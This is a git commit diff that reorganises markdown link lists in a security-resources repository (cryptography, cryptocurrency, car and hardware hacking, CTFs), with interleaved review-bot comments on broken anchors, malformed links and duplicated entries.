
Cleared some things up, added some stuff, changed some pages' ToCs to better reflect content.

Added some sections to break down content into appropriate categorization for future ease.
pull/8/head
root, 5 years ago
commit 5b6c68bf4b
166 changed files with 1142 additions and 15926 deletions
1. +7 -0 Draft/Anonymity Opsec Privacy -.md
2. +2 -1 Draft/CTFs & Wargames -.md
3. +2 -2 Draft/Car Hacking.md
4. +20 -5 Draft/CryptoCurrencies.md
5. +8 -3 Draft/Cryptography & Encryption.md
6. +0 -30 Draft/Cryptography & Encryption/Linux Systems.txt
7. +0 -28 Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
8. +0 -48 Draft/Cryptography & Encryption/cull.txt
9. +44 -51 Draft/Embedded Device & Hardware Hacking -.md
10. +81 -63 Draft/Exploit Development.md
11. +0 -0 Draft/Exploit_Dev_Lab.txt
12. +6 -6 Draft/Forensics Incident Response.md
13. +2 -2 Draft/Fuzzing Bug Hunting.md
14. +2 -1 Draft/Game Hacking.md
15. +0 -0 Draft/Gamma_group_hack_writeup.txt
16. +17 -23 Draft/Interesting Things Useful stuff.md
17. +0 -0 Draft/Lab for Practicing Exploit Writing.txt
18. +175 -142 Draft/Network Attacks & Defenses.md
19. +0 -92 Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt
20. +8 -0 Draft/Network Security Monitoring & Logging.md
21. +93 -55 Draft/Open Source Intelligence.md
22. +57 -21 Draft/Privilege Escalation & Post-Exploitation.md
23. +80 -13 Draft/Red-Teaming.md
24. +9 -0 Draft/Reverse Engineering.md
25. +11 -2 Draft/SCADA.md
26. +0 -3 Draft/Simulations/SCADA.txt
27. +13 -13 Draft/Social Engineering.md
28. +77 -53 Draft/System Internals Windows and Linux Internals Reference.md
29. +25 -6 Draft/Web & Browsers.md
30. +18 -14 Draft/Wireless Networks & RF.md
31. +0 -0 Draft/detect_virtual_box_c_prog.txt
32. +250 -378 Draft/things-added.md
33. +135 -40 README.md
34. +0 -104 _site/Draft/Draft/Anonymity Opsec Privacy -.md
35. +0 -27 _site/Draft/Draft/Anti-Forensics.md
36. +0 -165 _site/Draft/Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics – Michael.txt
37. +0 -421 _site/Draft/Draft/Attacking Defending Android -.md
38. +0 -135 _site/Draft/Draft/Attacking Defending iOS -.md
39. +0 -148 _site/Draft/Draft/BIOS UEFI Attacks Defenses.md
40. +0 -34 _site/Draft/Draft/Basic Security Information.md
41. +0 -54 _site/Draft/Draft/Building A Pentest Lab.md
42. +0 -50 _site/Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
43. +0 -113 _site/Draft/Draft/CTFs & Wargames -.md
44. +0 -175 _site/Draft/Draft/Cheat sheets reference pages Checklists -.md
45. +0 -11 _site/Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt
46. +0 -112 _site/Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
47. +0 -62 _site/Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt
48. +0 -119 _site/Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
49. +0 -242 _site/Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt
50. +0 -1 _site/Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
51. +0 -57 _site/Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
52. +0 -3 _site/Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt
53. +0 -98 _site/Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
54. +0 -111 _site/Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
55. +0 -67 _site/Draft/Draft/Client Side Attacks.md
56. +0 -36 _site/Draft/Draft/Con Videos Stuff -.md
57. +0 -82 _site/Draft/Draft/Counter Surveillance.md
58. +0 -154 _site/Draft/Draft/Courses & Training -.md
59. +0 -20 _site/Draft/Draft/CryptoCurrencies.md
60. +0 -135 _site/Draft/Draft/Cryptography & Encryption.md
61. +0 -30 _site/Draft/Draft/Cryptography & Encryption/Linux Systems.txt
62. +0 -28 _site/Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
63. +0 -48 _site/Draft/Draft/Cryptography & Encryption/cull.txt
64. +0 -69 _site/Draft/Draft/Darknets -.md
65. +0 -82 _site/Draft/Draft/Data AnalysisVisualization.md
66. +0 -51 _site/Draft/Draft/Disclosure.md
67. +0 -22 _site/Draft/Draft/Disinformation.md
68. +0 -83 _site/Draft/Draft/Documentation & Reports.md
69. +0 -0 _site/Draft/Draft/Draft.rtf
70. +0 -318 _site/Draft/Draft/Embedded Device & Hardware Hacking -.md
71. +0 -45 _site/Draft/Draft/Exfiltration.md
72. +0 -557 _site/Draft/Draft/Exploit Development.md
73. +0 -50 _site/Draft/Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
74. +0 -159 _site/Draft/Draft/Forensics Incident Response.md
75. +0 -257 _site/Draft/Draft/Forensics Incident Response/add cull.txt
76. +0 -160 _site/Draft/Draft/Frameworks.md
77. +0 -19 _site/Draft/Draft/Frameworks/Metasploit Reference.txt
78. +0 -67 _site/Draft/Draft/Frameworks/Meterpreter Scripts and Description.txt
79. +0 -110 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
80. +0 -832 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Enumeration.txt
81. +0 -315 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
82. +0 -0 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
83. +0 -29 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Password Cracking.txt
84. +0 -73 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Penetration.txt
85. +0 -128 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/VoIP Security.txt
86. +0 -67 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
87. +0 -231 _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
88. +0 -271 _site/Draft/Draft/Frameworks/Post Exploitation with Metasploit.txt
89. +0 -144 _site/Draft/Draft/Fuzzing Bug Hunting.md
90. +0 -25 _site/Draft/Draft/Google Hacking.md
91. +0 -6 _site/Draft/Draft/Home Security.md
92. +0 -100 _site/Draft/Draft/Honeypots -.md
93. +0 -195 _site/Draft/Draft/Interesting Things Useful stuff.md
94. +0 -409 _site/Draft/Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt
95. +0 -48 _site/Draft/Draft/Links.md
96. +0 -87 _site/Draft/Draft/Lockpicking -.md
97. +0 -88 _site/Draft/Draft/Logging - Combine with NSM.md
98. +0 -22 _site/Draft/Draft/MITM.md
99. +0 -353 _site/Draft/Draft/Malware.md
100. +0 -182 _site/Draft/Draft/Malware/Detect Virtualbox C prog.txt

+7 -0 Draft/Anonymity Opsec Privacy -.md

@ -45,6 +45,12 @@ https://github.com/NullHypothesis/exitmap/issues/37
[Deanonymizing Windows users and capturing Microsoft and VPN accounts](https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834)
[The Paranoid's Bible: An anti-dox effort.](https://paranoidsbible.tumblr.com/)
### <a name="Articles">Articles</a>
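Review bot: the anchor added here as `<a name="Articles">` is capitalized, while every other anchor touched in this commit is lowercase (`<a name="general">`, `<a name="generalhw">`, `<a name="papers">`). Fragment matching is case-sensitive in most renderers, so either make sure the page's ToC link is written `#Articles` exactly, or lowercase the anchor to `<a name="articles">` to keep the site-wide convention.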
@ -135,6 +141,7 @@ https://github.com/NullHypothesis/exitmap/issues/37
[De-Anonymizing Alt.Anonymous. Messages - Defcon21 - Tom Ritter](https://www.youtube.com/watch?v=_Tj6c2Ikq_E)
[PISSED: Privacy In a Surveillance State Evading Detection - Joe Cicero - CYPHERCON11 ](https://www.youtube.com/watch?v=keA3WcKwZwA)


+2 -1 Draft/CTFs & Wargames -.md

@ -9,7 +9,7 @@
Cull
#### Cull
[CTF Scripts and PyInstaller (.py > .exe) [CTF Scripts and PyInstaller (.py > .exe) ](http://www.primalsecurity.net/ctf-scripts-and-pyinstaller-py-exe/)
[AppJailLauncher](https://github.com/trailofbits/AppJailLauncher)
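Review bot: the PyInstaller entry in this hunk is malformed markdown: the link text is repeated and the first `[` is never closed (`[CTF Scripts and PyInstaller (.py > .exe) [CTF Scripts and PyInstaller (.py > .exe) ](http://www.primalsecurity.net/ctf-scripts-and-pyinstaller-py-exe/)`), so it renders as a literal bracket and title followed by the link. Since the hunk already touches the `#### Cull` heading directly above it, fix the line while here: `[CTF Scripts and PyInstaller (.py > .exe)](http://www.primalsecurity.net/ctf-scripts-and-pyinstaller-py-exe/)`.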
@ -27,6 +27,7 @@ pentestlab
root-me
#### end cull
### <a name="general">General</a>
[ctf-time](https://ctftime.org/)


+2 -2 Draft/Car Hacking.md

@ -55,9 +55,9 @@ Seriously check this first ---> [Awesome Vehicle Security List(github awesome li
[Adventures in Automotive Networks and Control Units](https://www.youtube.com/watch?v=MEYCU62yeYk&app=desktop)
* Charlie Miller & Chris Valasek
[Broadcasting your attack: Security testing DAB radio in cars - Andy Davis](http://2015.ruxcon.org.au/assets/2015/slides/Broadcasting-your-attack-Security-testing-DAB-radio-in-cars.pdf)
[A Survey of Remote Automotive Attack Surfaces - Black Hat USA 2014](https://www.youtube.com/watch?v=mNhFGJVq2HE)
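Review bot: `A Survey of Remote Automotive Attack Surfaces - Black Hat USA 2014` is added here and the identical entry also appears in the `General Hardware Hacking` list of the `Draft/Embedded Device & Hardware Hacking -.md` diff in this same commit. Car Hacking is the natural home; keep the entry here and have the hardware page link to this section rather than carrying the same line in two places, which is how the two copies drift.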


+20 -5 Draft/CryptoCurrencies.md

@ -1,20 +1,35 @@
##CryptoCurrencies
## CryptoCurrencies
######I don’t know.
###### I don’t know.
Bitcoin - What other alt coins?
Bitcointalk
/r/bitcoin
### General
[cryptocurrency](https://github.com/kilimchoi/cryptocurrency)
* Overview of top cryptocurrencies
### Bitcoin
[Bitcointalk](https://bitcointalk.org/)
[/r/bitcoin](https://reddit.com/r/bitcoin)
### Ethereum
[The Ether Thief](https://www.bloomberg.com/features/2017-the-ether-thief/)
### Talks/Presentations
[Deanonymisation of Clients in Bitcoin P2P Network](http://orbilu.uni.lu/bitstream/10993/18679/1/Ccsfp614s-biryukovATS.pdf)
* We present an effcient method to deanonymize Bitcoin users, which allows to link user pseudonyms to the IP addresses where the transactions are generated. Our techniques work for the most common and the most challenging scenario when users are behind NATs or rewalls of their ISPs. They allow to link transactions of a user behind a NAT and to distinguish connections and transactions of different users behind the same NAT. We also show that a natural countermeasure of using Tor or other anonymity services can be cut-o by abusing anti-DoS countermeasures of the Bitcoin network. Our attacks require only a few machines and have been experimentally verifed. The estimated success rate is between 11% and 60% depending on how stealthy an attacker wants to be. We propose several countermeasures to mitigate these new attacks.
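Review bot: `Deanonymisation of Clients in Bitcoin P2P Network` is filed under `### Talks/Presentations`, but the link is a PDF of the paper and the entry carries its abstract, so it belongs under a `### Papers` heading (the other pages in this commit already use a Papers section). The abstract was pasted from the PDF and lost its `fi`/`ff` ligatures (`effcient`, `rewalls`, `cut-o`, `verifed`); restore `efficient`, `firewalls`, `cut-off`, `verified` before merging so the text is searchable.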

+8 -3 Draft/Cryptography & Encryption.md

@ -20,8 +20,6 @@
https://conversations.im/xeps/multi-end.html
http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
### End Cull
@ -40,6 +38,10 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
[Snake Oil Crypto Competition](https://snakeoil.cr.yp.to/)
[Lifetimes of cryptographic hash functions](http://valerieaurora.org/hash.html)
[Top 10 Developer Crypto Mistakes](https://littlemaninmyhead.wordpress.com/2017/04/22/top-10-developer-crypto-mistakes/amp/)
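Review bot: `Top 10 Developer Crypto Mistakes` links to the `/amp/` variant of the post; link the canonical URL (drop the trailing `/amp/`) so readers land on the full page rather than the AMP rendering, which is the form used for every other link in this hunk.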
@ -67,7 +69,7 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
[How to Implement Crypto Poorly - Sean Cassidy](https://github.com/cxxr/talks/blob/master/2016/grrcon/How%20to%20Implement%20Crypto%20Poorly.pdf)
[CBC Byte Flipping Attack—101 Approach](http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/)
@ -202,7 +204,10 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
Applied Cryptography
### Crypto Libraries/Protocols
[OMEMO Multi-End Message and Object Encryption](https://conversations.im/omemo/)
* OMEMO is an XMPP Extension Protocol (XEP) for secure multi-client end-to-end encryption. It is an open standard based on a Double Ratchet and PEP which can be freely used and implemented by anyone. The protocol has been audited by a third party.
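Review bot: `Applied Cryptography` sits directly above the new `### Crypto Libraries/Protocols` heading as a bare title with no link, author or note, unlike every other entry in these hunks; give it the `[title](url)` form with the author, or move it under a Books heading so it does not read as a stray line. The OMEMO entry is a good addition; the description's `PEP` is an unexplained acronym for readers of this page and is worth expanding (Personal Eventing Protocol) in the sub-bullet.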


+0 -30 Draft/Cryptography & Encryption/Linux Systems.txt

@ -1,30 +0,0 @@
Tcplay
From: https://github.com/bwalex/tc-play
tcplay is a free (BSD-licensed), pretty much fully featured (including multiple keyfiles, cipher cascades, etc) and stable TrueCrypt implementation.
This implementation supports mapping (opening) both system and normal TrueCrypt volumes, as well as opening hidden volumes and opening an outer volume while protecting a hidden volume. There is also support to create volumes, including hidden volumes, etc. Since version 1.1, there is also support for restoring from the backup header (if present), change passphrase, keyfile and PBKDF2 PRF function.
Since tcplay uses dm-crypt (or dm_target_crypt on DragonFly) it makes full use of any available hardware encryption/decryption support once the volume has been mapped.
It is based solely on the documentation available on the TrueCrypt website, many hours of trial and error and the output of the Linux' TrueCrypt client. As it turns out, most technical documents on TrueCrypt contain mistakes, hence the trial and error approach.
Cryptsetup
From: https://code.google.com/p/cryptsetup/
Cryptsetup is utility used to conveniently setup disk encryption based on dm-crypt kernel module.
These include plain dm-crypt volumes, LUKS volumes, loop-AES and TrueCrypt compatible format.
Project also includes veritysetup utility used to conveniently setup dm-verity block integrity checking kernel module.
LUKS is the standard for Linux hard disk encryption. By providing a standard on-disk-format, it does not only facilitate compatibility among distributions, but also provides secure management of multiple user passwords. In contrast to existing solution, LUKS stores all setup necessary setup information in the partition header, enabling the user to transport or migrate his data seamlessly.
LUKS was designed according to TKS1, a template design developed in TKS1 for secure key setup. LUKS closely reassembles the structure recommended in the TKS1 paper, but also adds meta data for cipher setup management and LUKS also supports for multiple keys/passphrases. 4
Why LUKS?
compatiblity via standardization,
secure against low entropy attacks,
support for multiple keys,
effective passphrase revocation,
free
From: https://code.google.com/p/cryptsetup/
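Review bot: this removes the tcplay / cryptsetup / LUKS notes outright, and none of the visible hunks of `Draft/Cryptography & Encryption.md` in this commit re-add them. If the intent is consolidation rather than deletion, the cryptsetup and LUKS descriptions belong under the new `### Crypto Libraries/Protocols` heading; when re-adding, replace the `code.google.com/p/cryptsetup/` source URL (Google Code is gone) with the project's current home, and fix `reassembles` to `resembles` and `compatiblity` to `compatibility` while carrying the text over.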

+0 -28 Draft/Cryptography & Encryption/Vids Papers Blogposts.txt

@ -1,28 +0,0 @@
##Resources
[Attacking and Defending Full Disk Encryption - Tom Kopchak](http://www.irongeek.com/i.php?page=videos/bsidescleveland2014/attacking-and-defending-full-disk-encryption-tom-kopchak)
[InsidePro Wiki](http://wiki.insidepro.com/index.php/Main_Page)
Here you will find a lot of useful and unique information:
Detailed descriptions of various hashing algorithms and check sums.
Source codes of those algorithms in various programming languages.
Information on the application of certain algorithms.
Description of the applications that support such hashes.
Various articles on the subject.
Useful advice on handling hashes.
Links to various online resources on the subject of recovering passwords from hashes.
And much more.
[Zero-Knowledge Proofs - An Illustrated Primer](http://blog.cryptographyengineering.com/2014/11/zero-knowledge-proofs-illustrated-primer.html?m=1)
[Applied Cryptographic Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf)
[Instant ciphertext-only cryptnalysis of GSM encryptd communications](http://cryptome.org/gsm-crack-bbk.pdf)
[Malleability Attack against CBC Encrypted LUKS partitions](http://www.jakoblell.com/blog/2013/12/22/practical-malleability-attack-against-cbc-encrypted-luks-partitions/)
[How CryptoSystems are *Really* broken](http://www.forth.gr/onassis/lectures/pdf/How_Cryptosystems_Are_Really_Broken.pdf)
[Toward Robust Hidden Volumes using Write-Only Oblivious RAM](https://eprint.iacr.org/2014/344.pdf)
* With sensitive data being increasingly stored on mobile devices and laptops, hard disk encryption is more important than ever. In partic- ular, being able to plausibly deny that a hard disk contains certain information is a very useful and interesting research goal. However, it has been known for some time that existing “hidden volume” so- lutions, like TrueCrypt, fail in the face of an adversary who is able to observe the contents of a disk on multiple, separate occasions. In this work, we explore more robust constructions for hidden vol- umes and present HIVE, which is resistant to more powerful ad- versaries with multiple-snapshot capabilities. In pursuit of this, we propose the first security definitions for hidden volumes, and prove HIVE secure under these definitions. At the core of HIVE, we de- sign a new write-only Oblivious RAM. We show that, when only hiding writes, it is possible to achieve ORAM with optimal O (1) communication complexity and only poly-logarithmic user mem- ory. This is a significant improvement over existing work and an independently interesting result. We go on to show that our write- only ORAM is specially equipped to provide hidden volume func- tionality with low overhead and significantly increased security. Fi- nally, we implement HIVE as a Linux kernel block device to show both its practicality and usefulness on existing platforms.
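Review bot: same concern as the Linux Systems.txt removal: the Zero-Knowledge Proofs primer, the bettercrypto Applied Cryptographic Hardening guide, the LUKS CBC malleability write-up, the GSM ciphertext-only cryptanalysis paper and the HIVE write-only ORAM paper (with abstract) are deleted here and not re-added in any visible hunk of `Draft/Cryptography & Encryption.md`. Carry them into the main page's Papers and Articles sections rather than losing them with the cull file; the malleability write-up in particular pairs with the LUKS material being removed in the sibling file.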

+0 -48 Draft/Cryptography & Encryption/cull.txt

@ -1,48 +0,0 @@
A (relatively easy to understand) primer on elliptic curve cryptography
http://arstechnica.com/security/2013/10/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography/
HAVEGE [ HArdware Volatile Entropy Gathering and Expansion ]
http://www.irisa.fr/caps/projects/hipsor/
TextSecure Protocol
https://github.com/WhisperSystems/TextSecure/wiki/ProtocolV2
http://www.tau.ac.il/~tromer/acoustic/
Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPG's current implementation of RSA. The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts. We experimentally demonstrate that such attacks can be carried out, using either a plain mobile phone placed next to the computer, or a more sensitive microphone placed 4 meters away.
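Review bot: the acoustic-cryptanalysis entry being deleted here (`http://www.tau.ac.il/~tromer/acoustic/` plus abstract) never had a title line, so if it is migrated give it `[title](url)` form with the paper's title and authors; the ECC primer and HAVEGE links are also worth keeping under the main page's sections instead of going out with the cull file.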

+44 -51 Draft/Embedded Device & Hardware Hacking -.md

@ -3,10 +3,11 @@
https://en.wikipedia.org/wiki/Embedded_system
##### ToC
Cull
* [General](#general)
* [General Hardware Hacking](#generalhw)
* [General Hardware Articles/Writeups](#generalwriteups)
* [General Hardware Hacking Talks/Presentations](#generaltalks)
* [General Hardware Hacking Tools](#generaltools)
* [Attacking Routers](#routers)
* [Cable Modem Hacking](#modem)
* [Educational/Information on things you wouldn't find in a Dictionary](#education)
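Review bot: the ToC entries added here point at `#general`, `#generalwriteups`, `#generaltalks` and `#generaltools`, but the corresponding headings in the next hunk (`### General`, `### General Writeups/Articles`, `### General Talks/Presentations`, `### General Tools`) carry no `<a name=...>` anchor; only `### <a name="generalhw">General Hardware Hacking</a>` does. Add matching anchors to those four headings (or drop the ToC entries), otherwise the new ToC links go nowhere.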
@ -37,93 +38,81 @@ http://www.sp3ctr3.me/hardware-security-resources/
http://greatscottgadgets.com/infiltrate2013/
[ThunderGate](http://thundergate.io/)
* ThunderGate is a collection of tools for the manipulation of Tigon3 Gigabit Ethernet controllers, with special emphasis on the Broadcom NetLink 57762, such as is found in Apple Thunderbolt Gigabit Ethernet adapters.
[SPI](https://trmm.net/SPI_flash)
[ISO/IEC 7816](https://en.wikipedia.org/wiki/ISO/IEC_7816)
[ISO/IEC 15693](https://en.wikipedia.org/wiki/ISO/IEC_15693)
[ISO/IEC 14443](https://en.wikipedia.org/wiki/ISO/IEC_14443)
[Attacks via physical access to USB (DMA…?)](https://security.stackexchange.com/questions/118854/attacks-via-physical-access-to-usb-dma)
#### end sort
[Can a connected USB device read all data from the USB bus?](https://security.stackexchange.com/questions/37927/can-a-connected-usb-device-read-all-data-from-the-usb-bus?rq=1)
[Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)
[Ian Douglas - Creating an Internet of Private Things](https://www.youtube.com/watch?v=4W8SkujOXi4&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe&index=8)
* The next big market push is to have the cool IoT device that’s connected to the internet. As we’ve seen from the Mirai and Switcher hacks, it’s important to embed the appropriate safeguards so that devices are not open to attack. When selecting device components there are things that should be checked for, and when you’re doing the coding and workflows, there are other things that need to be taken in to account. Although security and privacy are close cousins, they’re also different. This talk will be centered around some best security and privacy practices as well as some common errors that should be avoided.
### General
[Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)](https://p16.praetorian.com/blog/reversing-and-exploiting-embedded-devices-part-1-the-software-stack)
[Hardware Security and Trust/ECE 4451/5451: Introduction to Hardware Security and Trust](https://www.engr.uconn.edu/~tehrani/teaching/hst/)
[NSA Playset](http://www.nsaplayset.org/)
* In the coming months and beyond, we will release a series of dead simple, easy to use tools to enable the next generation of security researchers. We, the security community have learned a lot in the past couple decades, yet the general public is still ill equipped to deal with real threats that face them every day, and ill informed as to what is possible. Inspired by the NSA ANT catalog, we hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. Now you can play along with the NSA!
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
[Breaking IPMI/BMC](http://fish2.com/ipmi/how-to-break-stuff.html)
[Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)
#### end sort
### General Writeups/Articles
[Door Control Systems: An Examination of Lines of Attack](https://www.nccgroup.com/en/blog/2013/09/door-control-systems-an-examination-of-lines-of-attack/)
[Smart Parking Meters](http://uninformed.org/?v=all&a=6&t=sumry)
* Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
### General
[Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)](https://p16.praetorian.com/blog/reversing-and-exploiting-embedded-devices-part-1-the-software-stack)
[Hardware Security and Trust/ECE 4451/5451: Introduction to Hardware Security and Trust](https://www.engr.uconn.edu/~tehrani/teaching/hst/)
[NSA Playset](http://www.nsaplayset.org/)
* In the coming months and beyond, we will release a series of dead simple, easy to use tools to enable the next generation of security researchers. We, the security community have learned a lot in the past couple decades, yet the general public is still ill equipped to deal with real threats that face them every day, and ill informed as to what is possible. Inspired by the NSA ANT catalog, we hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. Now you can play along with the NSA!
[Chip & PIN is Definitely Broken - Defcon 19](https://www.youtube.com/watch?v=JABJlvrZWbY)
| **NSA USB Playset - ShmooCon201** | https://www.youtube.com/watch?v=eTDBFpLYcGA
[Multiplexed Wired Attack Surfaces - Michael Ossmann & Kos - Toorcon15](https://www.youtube.com/watch?v=4QB79921Nlw)
* Manufacturers of mobile devices often multiplex several wired interfaces onto a single connector. Some of these interfaces, probably intended for test and development, are still enabled when the devices ship. We'll show you how you can get a shell on a popular mobile phone via its USB port without using a USB connection and we will release an open source tool for exploring multiplexed wired interfaces.
[Attacks via physical access to USB (DMA…?)](https://security.stackexchange.com/questions/118854/attacks-via-physical-access-to-usb-dma)
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
[Can a connected USB device read all data from the USB bus?](https://security.stackexchange.com/questions/37927/can-a-connected-usb-device-read-all-data-from-the-usb-bus?rq=1)
[Metasploit Hardware Brdige](https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix)
* [Hardware Bridge API](http://opengarages.org/hwbridge/)
### General Talks/Presentations
[Jackson Thuraisamy & Jason Tran - Hacking POS PoS Systems](https://www.youtube.com/watch?v=-n7oJqmTUCo)
[Hardware Hacking the Easyware Way](http://www.irongeek.com/i.php?page=videos/derbycon6/417-hardware-hacking-the-easyware-way-brian-fehrman)
* Interested in hardware hacking but not quite sure where to start? Does the thought of soldering thrill you (or scare you)? Come check out this talk to see just how easy it is to jump into this exciting field of research! Many people and companies use similar models of hardware. Unlike software, these devices rarely receive security updates. Sometimes, used devices are sold without clearing the configurations and important data is left behind. After this talk, you will know how to find hidden interfaces on these devices, start searching for vulnerabilities and sensitive information, and have irresistible urges to go home and tear apart all your old networking equipment. Did we mention...live demo?
[Deconstructing the Circuit Board Sandwich DEF CON 22 - Joe Grand aka Kingpin](https://www.youtube.com/watch?v=O8FQZIPkgZM)
### <a name="generalhw">General Hardware Hacking</a>
[Multiplexed Wired Attack Surfaces - Michael Ossmann & Kos - Toorcon15](https://www.youtube.com/watch?v=4QB79921Nlw)
* Manufacturers of mobile devices often multiplex several wired interfaces onto a single connector. Some of these interfaces, probably intended for test and development, are still enabled when the devices ship. We'll show you how you can get a shell on a popular mobile phone via its USB port without using a USB connection and we will release an open source tool for exploring multiplexed wired interfaces.
[Door Control Systems: An Examination of Lines of Attack](https://www.nccgroup.com/en/blog/2013/09/door-control-systems-an-examination-of-lines-of-attack/)
[SATELLITE TV RECEIVERS: FROM REMOTE CONTROL TO ROOT SHELL - Sofiane Talmat](https://vimeo.com/album/3682874/video/148910624)
[ChipWhisperer](http://www.newae.com/chipwhisperer)
* ChipWhisperer is the first ever open-source solution that provides a complete toolchain for research and analysis of embedded hardware security. Side Channel Power Analysis, Clock Glitching, VCC Glitching, and more are all possible with this unique tool.
[NSA USB Playset - ShmooCon201](https://www.youtube.com/watch?v=eTDBFpLYcGA)
[Breaking IPMI/BMC](http://fish2.com/ipmi/how-to-break-stuff.html)
[Chip & PIN is Definitely Broken - Defcon 19](https://www.youtube.com/watch?v=JABJlvrZWbY)
[Deconstructing the Circuit Board Sandwich DEF CON 22 - Joe Grand aka Kingpin](https://www.youtube.com/watch?v=O8FQZIPkgZM)
[Ian Douglas - Creating an Internet of Private Things](https://www.youtube.com/watch?v=4W8SkujOXi4&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe&index=8)
* The next big market push is to have the cool IoT device that’s connected to the internet. As we’ve seen from the Mirai and Switcher hacks, it’s important to embed the appropriate safeguards so that devices are not open to attack. When selecting device components there are things that should be checked for, and when you’re doing the coding and workflows, there are other things that need to be taken in to account. Although security and privacy are close cousins, they’re also different. This talk will be centered around some best security and privacy practices as well as some common errors that should be avoided.
[The Sorcerer’s Apprentice Guide to Fault Attacks](https://eprint.iacr.org/2004/100.pdf)
* The effect of faults on electronic systems has been studied since the 1970s when it was noticed that radioactive particles caused errors in chips. This led to further research on the effect of charged particles on silicon, motivated by the aerospace industry who was becoming concerned about the effect of faults in airborne electronic systems. Since then various mechanisms for fault creation and propagation have been discovered and researched. This paper covers the various methods that can be used to induce faults in semiconductors and exploit such errors maliciously. Several examples of attacks stemming from the exploiting of faults are explained. Finally a series of countermeasures to thwart these attacks are described.
[A Survey of Remote Automotive Attack Surfaces - Black Hat USA 2014](https://www.youtube.com/watch?v=mNhFGJVq2HE)
[Smart Parking Meters](http://uninformed.org/?v=all&a=6&t=sumry)
* Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
[SATELLITE TV RECEIVERS: FROM REMOTE CONTROL TO ROOT SHELL - Sofiane Talmat](https://vimeo.com/album/3682874/video/148910624)
[Hardware Hacking the Easyware Way](http://www.irongeek.com/i.php?page=videos/derbycon6/417-hardware-hacking-the-easyware-way-brian-fehrman)
* Interested in hardware hacking but not quite sure where to start? Does the thought of soldering thrill you (or scare you)? Come check out this talk to see just how easy it is to jump into this exciting field of research! Many people and companies use similar models of hardware. Unlike software, these devices rarely receive security updates. Sometimes, used devices are sold without clearing the configurations and important data is left behind. After this talk, you will know how to find hidden interfaces on these devices, start searching for vulnerabilities and sensitive information, and have irresistible urges to go home and tear apart all your old networking equipment. Did we mention...live demo?
### General Tools
[ThunderGate](http://thundergate.io/)
* ThunderGate is a collection of tools for the manipulation of Tigon3 Gigabit Ethernet controllers, with special emphasis on the Broadcom NetLink 57762, such as is found in Apple Thunderbolt Gigabit Ethernet adapters.
[Metasploit Hardware Brdige](https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix)
* [Hardware Bridge API](http://opengarages.org/hwbridge/)
[ChipWhisperer](http://www.newae.com/chipwhisperer)
* ChipWhisperer is the first ever open-source solution that provides a complete toolchain for research and analysis of embedded hardware security. Side Channel Power Analysis, Clock Glitching, VCC Glitching, and more are all possible with this unique tool.
